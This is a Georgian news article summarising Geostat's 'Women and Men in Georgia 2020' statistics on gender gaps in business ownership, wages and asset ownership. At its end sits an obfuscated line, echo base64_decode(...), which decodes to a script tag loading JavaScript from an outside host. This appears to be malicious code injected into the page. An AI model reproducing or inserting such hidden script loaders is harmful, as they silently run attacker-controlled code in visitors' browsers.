celsiusi
ავერსი საქკაბელი
საქართველოში ბიზნეს სექტორში მომუშავე ქალთა რაოდენობა 313 ათასი, ხოლო მამაკაცების 444 ათასია. რაც შეეხება ხელფასებს, ქალების საშუალო ხელფასი კაცების საშუალო ხელფასის 63%-ს შეადგენდა. ამის შესახებ საქსტატის მიერ გაეროს ქალთა ორგანიზაციის მხარდაჭერით მომზადებულ პუბლიკაციაში „ქალი და კაცი საქართველოში 2020-შია“ საუბარი.
 
2019 წლის მონაცემებით, ბიზნესის დამფუძნებელი კაცების რიცხვი თითქმის ორჯერ აღემატება ქალების რიცხოვნობას, რომლებიც საქართველოში რეგისტრირებული ბიზნესის მფლობელების დაახლოებით 35 პროცენტს შეადგენენ. ქალი მფლობელების წილი ვაჭრობის სექტორში 40 პროცენტია, რომელიც, თავის მხრივ, წარმოადგენს ბიზნესის უმსხვილეს სფეროს ეკონომიკის სექტორებს შორის. ბიზნესის მფლობელი ქალების შედარებით მცირე რაოდენობა გვხვდება სამთო-მოპოვებით მრეწველობაში, მშენებლობაში, ტრანსპორტის და დასაწყობების სფეროში და სოფლის მეურნეობაში.
 
მეორე მხრივ, მფლობელი ქალების რიცხოვნობა გაცილებით მეტია, კაცი მფლობელების რიცხოვნობაზე საქმიანობის ისეთ სფეროებში, როგორიცაა განათლება, ჯანდაცვა და სოციალური მომსახურება და სხვა სახის მომსახურებები.
 
ამავე პუბლიკაციის მიხედვით, გენდერული ნიშნით აქტივების ფლობის თვალსაზრისით, საქართველოში კაცები ლიდერობენ. კვლევა აჩვენებს, რომ კაცები ფლობენ და განკარგავენ თითქმის ყველა ტიპის აქტივის დიდ ნაწილს, როგორიცაა უძრავი ქონება, მიწა და მსხვილი ტექნიკა. აქტივების ფლობაში გენდერული დისპროპორცია კაცების უპირატესობით უფრო მეტად გამოხატულია სოფლად.
1439
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");